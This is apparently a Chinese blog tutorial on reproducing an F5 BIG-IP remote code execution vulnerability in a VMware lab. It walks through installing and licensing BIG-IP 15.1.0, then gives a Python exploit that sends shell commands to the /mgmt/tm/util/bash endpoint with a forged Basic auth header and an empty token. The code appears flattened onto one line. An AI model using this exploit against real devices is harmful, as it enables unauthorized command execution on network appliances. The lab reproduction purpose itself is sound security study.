F5 BIG-IP 远程代码执行漏洞 CVE--22986 虚拟机上复现

一、在vmware上安装BIGIP-15.1.0

进入F5官方主页：/csp/home

点击下载按钮（如下图所示）

进入页面后，我们选择v15.X版本

选择15.1.0长期维护版本

在这里，我们选择虚拟化版本

点击我接受按钮

选择第一个下载

下载完成之后，我们将下载下来的ova文件拖动到虚拟机当中，即可完成虚拟机的安装

二、BIGIP虚拟机的初始使用

虚拟机登陆

虚拟机装好后 默认的用户名是 root，密码是default.

个别用户登陆后，会强制要求更换密码。这里更换的密码不能是一些常用的字符组合（比如单词）否则很容易不通过。如果您失败了几次，不妨尝试类似于f8fa7g4k3k69o这样的密码。

远程web登陆

虚拟机root登陆成功后，通过ifconfig命令获取ip地址(虚拟机要桥接模式哦)，假设这里获取的ip为10.0.0.166, 那么在host主机访问这个网址，进入web配置页面

web远程登陆的用户名和密码都是admin,但是我在登陆的时候密码始终不对，最后，我只好重置这个密码（如下图，输入两遍新密码）

终于，在重置密码后，我web远程登陆成功了

license激活

接下来，我们点击license按钮（我这里是激活过的）

如果不是已激活的状态，需要进入官网：（/trial）来获取激活码

流程如图所示，选择红色框框选中的按钮

点击Get started按钮

填写你的申请信息（官网要登陆哦）

稍后，会在半个小时内，将激活码发送到您的邮箱里面（邮箱是官网账号注册时留的邮箱）

我们收到激活码后填写到下面的Base Registration Key栏中，然后选择Automatic模式进行激活（因为本人激活过了，所以下图是在网上找的，网上的那个人选择的是第二个，这里我实际操作选择的是第一个）

然后点击Next按钮，如果出现下一步或者我接受之类的按钮一律点击即可

之后一般会自动跳转到如下图所示的界面，这就代表激活成功了

三、远程代码执行命令

执行代码

import requestsimport jsonfrom requests.packages.urllib3.exceptions import InsecureRequestWarningrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)def attack(target_url, command="pwd"):command = f"\'{command}\'"check_url = target_url + '/mgmt/tm/util/bash'headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",'Content-Type': 'application/json','X-F5-Auth-Token': '','Authorization': 'Basic YWRtaW46QVNhc1M='}data = {'command': "run",'utilCmdArgs':f"-c {command}"}try:response = requests.post(url=check_url, json=data, headers=headers, verify=False, timeout=5)if response.status_code == 200 and 'commandResult' in response.text:print(" {} 存在漏洞".format(target_url))attack_result = json.loads(response.text.replace('\\n', '\\t')).get('commandResult', None)return attack_resultelse:print("{} 不存在漏洞".format(target_url))except Exception as e:print('url 访问异常 {}'.format(target_url))def format_url(url):try:if url[:4] != "http":url = "https://" + urlurl = url.strip()return urlexcept Exception as e:print('URL 错误 {}'.format(url))if __name__ == '__main__':# 你的虚拟机ip地址ip = "your ip"# 执行的命令command = "ls"url = format_url(ip)# 输出返回结果print(attack(url, command))

上面的代码用户使用的时候，只需要将ip 改成您虚拟机的ip即可，其余无需改变

执行结果展示

查看当前路径

查看当前路径下的文件

3.创建一个目录

到虚拟机中，我们查看目录是否创建成功

可以看到目录创建成功